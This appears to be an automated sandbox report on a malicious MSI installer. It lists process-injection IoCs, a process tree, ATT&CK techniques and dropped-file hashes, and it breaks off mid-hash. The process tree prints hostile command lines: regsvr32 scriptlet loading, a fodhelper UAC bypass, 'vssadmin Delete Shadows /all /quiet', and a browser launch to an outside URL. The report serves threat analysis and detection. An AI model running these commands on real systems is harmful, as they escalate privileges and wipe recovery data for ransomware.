Token: SeTakeOwnershipPrivilege	2344	msiexec.exe
Token: SeRestorePrivilege	2344	msiexec.exe
Token: SeTakeOwnershipPrivilege	2344	msiexec.exe
Token: SeRestorePrivilege	2344	msiexec.exe
Token: SeTakeOwnershipPrivilege	2344	msiexec.exe
Token: SeRestorePrivilege	2344	msiexec.exe
Token: SeTakeOwnershipPrivilege	2344	msiexec.exe
Token: SeRestorePrivilege	2344	msiexec.exe
Token: SeTakeOwnershipPrivilege	2344	msiexec.exe
Token: SeRestorePrivilege	2344	msiexec.exe
Token: SeTakeOwnershipPrivilege	2344	msiexec.exe
Token: SeRestorePrivilege	2344	msiexec.exe
Token: SeTakeOwnershipPrivilege	2344	msiexec.exe
Token: SeRestorePrivilege	2344	msiexec.exe
Token: SeTakeOwnershipPrivilege	2344	msiexec.exe
Token: SeRestorePrivilege	2344	msiexec.exe

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

msiexec.exemsedge.exe

pid process

5104 msiexec.exe
5104 msiexec.exe
4984 msedge.exe
4984 msedge.exe

pid	process
5104	msiexec.exe
5104	msiexec.exe
4984	msedge.exe
4984	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msiexec.exetaskhostw.exesihost.exesvchost.exeMsiExec.execmd.exemsedge.exe

description	pid	process	target process
PID 2344 wrote to memory of 3300	2344	msiexec.exe	srtasks.exe
PID 2344 wrote to memory of 3300	2344	msiexec.exe	srtasks.exe
PID 2344 wrote to memory of 748	2344	msiexec.exe	MsiExec.exe
PID 2344 wrote to memory of 748	2344	msiexec.exe	MsiExec.exe
PID 2492 wrote to memory of 2336	2492	taskhostw.exe	regsvr32.exe
PID 2492 wrote to memory of 2336	2492	taskhostw.exe	regsvr32.exe
PID 2384 wrote to memory of 3052	2384	sihost.exe	regsvr32.exe
PID 2384 wrote to memory of 3052	2384	sihost.exe	regsvr32.exe
PID 2396 wrote to memory of 1876	2396	svchost.exe	regsvr32.exe
PID 2396 wrote to memory of 1876	2396	svchost.exe	regsvr32.exe
PID 748 wrote to memory of 1404	748	MsiExec.exe	cmd.exe
PID 748 wrote to memory of 1404	748	MsiExec.exe	cmd.exe
PID 1404 wrote to memory of 4984	1404	cmd.exe	msedge.exe
PID 1404 wrote to memory of 4984	1404	cmd.exe	msedge.exe
PID 4984 wrote to memory of 4816	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 4816	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1872	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 4400	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 4400	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1528	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1528	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1528	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1528	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1528	4984	msedge.exe	msedge.exe
PID 4984 wrote to memory of 1528	4984	msedge.exe	msedge.exe

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2384

C:\Windows\system32\regsvr32.exe
regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn
2⤵
- Modifies registry class
PID:3052

C:\Windows\system32\cmd.exe
cmd /c "start fodhelper.exe"
2⤵
PID:4388

C:\Windows\system32\fodhelper.exe
fodhelper.exe
3⤵
PID:4908

C:\Windows\system32\regsvr32.exe
"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
4⤵
PID:1808

C:\Windows\System32\vssadmin.exe
"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
5⤵
- Interacts with shadow copies
PID:800

C:\Windows\system32\cmd.exe
cmd /c "start fodhelper.exe"
2⤵
PID:1896

C:\Windows\system32\fodhelper.exe
fodhelper.exe
3⤵
PID:1064

C:\Windows\system32\regsvr32.exe
"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
4⤵
PID:4344

C:\Windows\System32\vssadmin.exe
"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
5⤵
- Interacts with shadow copies
PID:2464

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Suspicious use of WriteProcessMemory
PID:2492

C:\Windows\system32\regsvr32.exe
regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn
2⤵
- Modifies registry class
PID:2336

C:\Windows\system32\cmd.exe
cmd /c "start fodhelper.exe"
2⤵
PID:868

C:\Windows\system32\fodhelper.exe
fodhelper.exe
3⤵
PID:4856

C:\Windows\system32\regsvr32.exe
"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
4⤵
PID:1076

C:\Windows\System32\vssadmin.exe
"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
5⤵
- Interacts with shadow copies
PID:2820

C:\Windows\system32\cmd.exe
cmd /c "start fodhelper.exe"
2⤵
PID:2464

C:\Windows\system32\fodhelper.exe
fodhelper.exe
3⤵
PID:4548

C:\Windows\system32\regsvr32.exe
"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
4⤵
PID:4444

C:\Windows\System32\vssadmin.exe
"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
5⤵
- Interacts with shadow copies
PID:3736

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
- Suspicious use of WriteProcessMemory
PID:2396

C:\Windows\system32\regsvr32.exe
regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn
2⤵
- Modifies registry class
PID:1876

C:\Windows\system32\cmd.exe
cmd /c "start fodhelper.exe"
2⤵
PID:3100

C:\Windows\system32\fodhelper.exe
fodhelper.exe
3⤵
PID:928

C:\Windows\system32\regsvr32.exe
"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
4⤵
PID:4812

C:\Windows\System32\vssadmin.exe
"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
5⤵
- Interacts with shadow copies
PID:2308

C:\Windows\system32\cmd.exe
cmd /c "start fodhelper.exe"
2⤵
PID:1736

C:\Windows\system32\fodhelper.exe
fodhelper.exe
3⤵
PID:2340

C:\Windows\system32\regsvr32.exe
"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
4⤵
PID:2560

C:\Windows\System32\vssadmin.exe
"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
5⤵
- Interacts with shadow copies
PID:3900

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\MAG.msi
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5104

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2344

C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
2⤵
PID:3300

C:\Windows\System32\MsiExec.exe
C:\Windows\System32\MsiExec.exe -Embedding B5F14857B5BDF5100937F8735977CDBC
2⤵
- Modifies extensions of user files
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:748

C:\Windows\System32\cmd.exe
cmd /c "start microsoft-edge:http://2e80a6c8ameemybio.cryless.info/meemybio^&1^&43548853^&81^&417^&2219041
3⤵
- Suspicious use of WriteProcessMemory
PID:1404

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://2e80a6c8ameemybio.cryless.info/meemybio&1&43548853&81&417&2219041
4⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4984

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0x11c,0x120,0x40,0x124,0x7ff9211946f8,0x7ff921194708,0x7ff921194718
5⤵
PID:4816

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2
5⤵
PID:1872

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2608 /prefetch:3
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4400

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3288 /prefetch:8
5⤵
PID:1528

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3740 /prefetch:1
5⤵
PID:1136

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3748 /prefetch:1
5⤵
PID:3900

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
5⤵
PID:2660

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5248 /prefetch:8
5⤵
PID:4216

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4152 /prefetch:8
5⤵
PID:1076

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
5⤵
PID:3484

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4388 /prefetch:1
5⤵
PID:4008

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5904 /prefetch:8
5⤵
PID:4312

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
5⤵
- Drops file in Program Files directory
PID:264

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6283d5460,0x7ff6283d5470,0x7ff6283d5480
6⤵
PID:1048

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5904 /prefetch:8
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4304

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2668 /prefetch:8
5⤵
PID:764

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8
5⤵
PID:2340

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4960 /prefetch:8
5⤵
PID:4048

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5900 /prefetch:8
5⤵
PID:4520

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8
5⤵
PID:4568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4884 /prefetch:2
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:264

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3588 /prefetch:8
5⤵
PID:3276

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5484 /prefetch:8
5⤵
PID:4196

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2640 /prefetch:8
5⤵
PID:756

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:5088

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:4868

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4728

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:4388

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\Advertising
Filesize
24KB

MD5
4e9962558e74db5038d8073a5b3431aa

SHA1
3cd097d9dd4b16a69efbb0fd1efe862867822146

SHA256
6f81212bd841eca89aa6f291818b4ad2582d7cdb4e488adea98261494bdcd279

SHA512
fcd76bca998afc517c87de0db6ee54e45aa2263fa7b91653ac3adb34c41f3681fbe19d673ae9b24fdf3d53f5af4e4968e603a1eb557207f8860ac51372026b2e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\Analytics
Filesize
4KB

MD5
fad197d6ffd32d1268b9e7e8d13ab32a

SHA1
b0129887a75965bb2ef56a2c39d3231e5b87265d

SHA256
4e446af739e1a06b48a73607e9441bc4aa34ceafd808ff845864408179a4d2c3

SHA512
01d9f588bfa315e316ff0ff4a15a0a49144fd77ee89960882cd528d7f7a277b086667cea2357c3ca2bd16a2b3f4aeb7fcaf473501b499101be68acbe1e0126cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\CompatExceptions
Filesize
660B

MD5
900263477e1368869fbf1be99990c878

SHA1
e56e199aa4119f3cc4c4d46f96daea89bbf9685a

SHA256
7f660d9db521646e9c6510d844b6c6ea26716b620c46f34edaf7ce318a9473e4

SHA512
1035b388b4b00c744824d13c5ef48118d88abbb53e9d76896a2d96a2a127a7739c119e781d7d5f0b8d910e10539c0c502c9f937fc2487747c65e7285f4b1e6d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\Content
Filesize
6KB

MD5
94c183b842784d0ae69f8aa57c8ac015

SHA1
c5b1ebc2b5c140ccbb21cd377ca18f3c5d0b80cd

SHA256
aa5c4d50684aa478d5982e509cbf1f8347fbc9cc75cb847d54915c16c3a33d25

SHA512
5808ddb81657acf4712fa845c95aacbab32a414ffda3b9d1218637e2d53bd3e0d6b95c872779ead6eaa13b4d2d563494ad5587337958bd17f1e791fad5d822fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\Cryptomining
Filesize
1KB

MD5
8c31feb9c3faaa9794aa22ce9f48bfbd

SHA1
f5411608a15e803afc97961b310bb21a6a8bd5b6

SHA256
6016fd3685046b33c7a2b1e785ac757df20e7c760abe0c27e1b8b0294222421d

SHA512
ba4b5886c04ba8f7a7dbb87e96d639783a5969a245de181cf620b8f536e3ac95bbd910cd2f1f6aae6c3cd70fc1ef6209dc10d2b083ec51861b51d83f95811baa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\Entities
Filesize
68KB

MD5
0d37c9d98f35f2c6524bd9b874ec93ed

SHA1
87d2d1149db8a1c2d91bc8d2d6e2827d2d8850f5

SHA256
19ce05d2716fae5d0d6e2067a7a624c0fa7f8b02486d9469861fd30cf1c499ac

SHA512
68e73804a144cbe7287c2136ab1986c4e2a97c497d5bfd36ef5db0f1fb1b4a28839d63d83019082ce61af9b42853934888ce05d6b28350742776b97fa310a575

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\Fingerprinting
Filesize
1KB

MD5
b51076d21461e00fcbf3dbd2c9e96b2b

SHA1
31311536cf570f2f9c88d21f03a935ac6e233231

SHA256
21a8d3e85d76761a1aab9dca765efef5dfa08d49db037befd91833e4639dd993

SHA512
3e193220ddddc47ecea32a2f777e55faa12c7a8052323455c8d7a89c01048155c77ae009fd0f5bebea89f1fae4a88b6b3ceca4e808064f474ea5b3a9497598cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\Other
Filesize
34B

MD5
cd0395742b85e2b669eaec1d5f15b65b

SHA1
43c81d1c62fc7ff94f9364639c9a46a0747d122e

SHA256
2b4a47b82cbe70e34407c7df126a24007aff8b45d5716db384d27cc1f3b30707

SHA512
4df2ce734e2f7bc5f02bb7845ea801b57dcf649565dd94b1b71f578b453ba0a17c61ccee73e7cff8f23cdd6aa37e55be5cb15f4767ff88a9a06de3623604fbf0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\Social
Filesize
999B

MD5
152b745da17397ed5a2f3059bb157600

SHA1
47bf4e575ba1acf47dcc99f1800f753b4cc65ef6

SHA256
ef994058a637f7b1b47c31c8670977084d1f86cc21a196920aa87f8ed31e98e8

SHA512
4984a8a46eb452b3c62f2c2ca8c9d999de37c39895ad9a9ed91d12a7731b1cd227f335829f7a6927f19cd8bf4dd7d6749fc853461a46fc97853d5b9e23171d31

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\Advertising
Filesize
459B

MD5
d024831cae8599f0edee70275d99e843

SHA1
69e08b543802b130da5305cbb0140bda5601079c

SHA256
0b75817b9ce2164f52e537c66bbff0fe53024bf9a00fb193efd63fe48f34a978

SHA512
ee1096446f6a17bc3fde9aadb418ca4b2db5132cdde1e429300487aaf4d8b9865a3bbc95d3a3198cde137a6395f69c035b74a72f74edc22a490bccc3320b0b03

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\Analytics
Filesize
50B

MD5
4cefbb980962973a354915a49d1b0f4d

SHA1
1d20148cab5cdadb85fad6041262584a12c2745d

SHA256
66de8db363de02974a1471153112e51f014bb05936ce870c433fd9a85b34455a

SHA512
6a088bbc6c40454165ddee3183667d2997dca5fcc8312f69e3c2397e61255e49b5146b24c2c64cd3c8867289e3abfdf1155e47722fdd8276f96d51e8f311d4b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\Content
Filesize
36B

MD5
7f077f40c2d1ce8e95faa8fdb23ed8b4

SHA1
2c329e3e20ea559974ddcaabc2c7c22de81e7ad2

SHA256
bda08f8b53c121bbc03da1f5c870c016b06fa620a2c02375988555dd12889cdf

SHA512
c1fb5d40491ae22a155a9bd115c32cbe9dbcba615545af2f1a252475f9d59844763cd7c177f08277d8ef59e873b7d885fda17f2a504d9ec2c181d0f793cb542b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\Cryptomining
Filesize
32B

MD5
4ec1eda0e8a06238ff5bf88569964d59

SHA1
